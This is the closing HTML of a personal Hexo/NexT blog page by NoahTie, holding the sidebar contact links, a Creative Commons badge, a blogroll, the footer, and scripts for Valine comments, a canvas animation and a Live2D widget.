      <span class="links-of-author-item">
        <a href="mailto:noahtie@foxmail.com" title="E-Mail → mailto:noahtie@foxmail.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="http://wpa.qq.com/msgrd?v=3&uin=571364304&site=qq&menu=yes" title="QQ → http:&#x2F;&#x2F;wpa.qq.com&#x2F;msgrd?v&#x3D;3&amp;uin&#x3D;571364304&amp;site&#x3D;qq&amp;menu&#x3D;yes" rel="noopener" target="_blank"><i class="fab fa-qq fa-fw"></i>QQ</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      友链
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.wootec.top/" title="https:&#x2F;&#x2F;www.wootec.top" rel="noopener" target="_blank">Reverier's Blog</a>
        </li>
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2020 – 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">NoahTie</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a> 强力驱动
  </div><script color="0,0,255" opacity="0.5" zIndex="-1" count="99" src="https://cdn.jsdelivr.net/npm/canvas-nest.js@1/dist/canvas-nest.js"></script>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : false,
      appId      : 'Cd1LV9Hip0zo9XBt7rBn6Yqs-MdYXbMMI',
      appKey     : 'yM4hszYa7RMP9zzL3C0t41P1',
      placeholder: "Just go go",
      avatar     : 'monsterid',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : 'zh-cn' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/shizuku.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true,"scale":0.25}});</script></body>
</html>

